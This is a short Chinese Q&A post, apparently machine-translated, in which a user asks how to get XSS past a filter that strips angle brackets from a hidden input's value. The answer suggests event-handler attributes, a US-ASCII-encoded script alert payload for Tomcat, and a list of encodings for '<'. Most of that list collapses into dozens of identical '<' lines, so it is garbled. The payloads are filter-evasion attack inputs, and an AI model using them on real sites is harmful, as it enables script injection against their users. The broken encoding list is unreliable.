网站<>替换<>逻辑
所以我可以使用'," ......等
我可以注射
<input type="hidden" value="$input">
那么如何在没有accesskey,样式标签的情况下攻击xss?
答案 0 :(得分:1)
您需要提供有关注入代码的确切位置的详细信息,以及有关服务器或网站信息的更多信息
由于您没有提供此类信息,您可以尝试其中一些:
尝试添加属性,
尝试使用事件处理程序(onLoad(),onMouseOver()等)
US-ASCII编码? (Apache Tomcat) - 您可以尝试:¼script¾alert(¢XSS¢)¼/script¾。
由于只有<,>被网站取代,请查看以下内容:
HTML和JavaScript中所有可能的角色组合“<”。
其中大部分都不会开箱即用,但其中许多都可以在某些情况下渲染。
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C